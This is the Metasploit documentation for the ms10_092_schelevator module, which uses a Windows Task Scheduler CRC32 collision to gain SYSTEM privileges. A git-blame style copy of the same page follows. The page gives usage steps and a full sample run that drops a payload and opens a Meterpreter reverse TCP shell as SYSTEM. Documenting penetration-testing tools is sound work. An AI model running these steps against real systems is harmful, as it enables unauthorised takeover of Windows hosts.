documentation/modules/exploit/windows/local/ms10_092_schelevator.md

## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32
checksum to validate that the file has not been tampered with. Also, In a default
configuration, normal users can read and write the task files that they have
created. By modifying the task file and creating a CRC32 collision, an attacker
can execute arbitrary commands with SYSTEM privileges.

## Verification Steps

1. Start msfconsole
2. Get a Meterpreter session
3. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
4. Do: `set SESSION <session id>`
5. Do: `run`

## Options

### TASKNAME

A name for the created task (default is random)

## Scenarios

### Windows Server 2008 SP1 (x64)

```
msf6 > use exploit/windows/local/ms10_092_schelevator
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf6 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
[*] Creating task: qThxbR37
[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
[*] Original CRC32: 0xec6cfb1d
[*] Final CRC32: 0xec6cfb1d
[*] Writing our modified content back...
[*] Validating task: qThxbR37
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
[*] Executing the task...
[*] Sending stage (200774 bytes) to 192.168.200.218
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
[*] Deleting task pcT2p46d0...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-17B09RRRJTG
OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : CORP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```
Create ms15_100_mcl_exe.md and Create ms10_092_schelevator.md 2019-11-27 18:12:57 -07:00			`## Vulnerable Application`

ms10_092_schelevator: Cleanup 2022-08-19 15:19:28 +10:00			`This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.`
			`When processing task files, the Windows Task Scheduler only uses a CRC32`
			`checksum to validate that the file has not been tampered with. Also, In a default`
			`configuration, normal users can read and write the task files that they have`
			`created. By modifying the task file and creating a CRC32 collision, an attacker`
			`can execute arbitrary commands with SYSTEM privileges.`
Create ms15_100_mcl_exe.md and Create ms10_092_schelevator.md 2019-11-27 18:12:57 -07:00
			`## Verification Steps`

			`1. Start msfconsole`
ms10_092_schelevator: Cleanup 2022-08-19 15:19:28 +10:00			`2. Get a Meterpreter session`
			3. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
			4. Do: `set SESSION <session id>`
			5. Do: `run`

			`## Options`

			`### TASKNAME`

			`A name for the created task (default is random)`

			`## Scenarios`

			`### Windows Server 2008 SP1 (x64)`

			```
			`msf6 > use exploit/windows/local/ms10_092_schelevator`
			`[*] Using configured payload windows/x64/meterpreter/reverse_tcp`
			`msf6 exploit(windows/local/ms10_092_schelevator) > set session 1`
			`session => 1`
			`msf6 exploit(windows/local/ms10_092_schelevator) > run`

			`[*] Started reverse TCP handler on 192.168.200.130:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[!] The service is running, but could not be validated.`
			`[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe`
			`[*] Creating task: qThxbR37`
			`[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...`
			`[*] Original CRC32: 0xec6cfb1d`
			`[*] Final CRC32: 0xec6cfb1d`
			`[*] Writing our modified content back...`
			`[*] Validating task: qThxbR37`
			`[*] Disabling the task...`
			`[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.`
			`[*] Enabling the task...`
			`[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.`
			`[*] Executing the task...`
			`[*] Sending stage (200774 bytes) to 192.168.200.218`
			`[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400`
			`[*] Deleting task pcT2p46d0...`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > sysinfo`
			`Computer : WIN-17B09RRRJTG`
			`OS : Windows 2008 (6.0 Build 6001, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : CORP`
			`Logged On Users : 3`
			`Meterpreter : x64/windows`
			`meterpreter >`
			```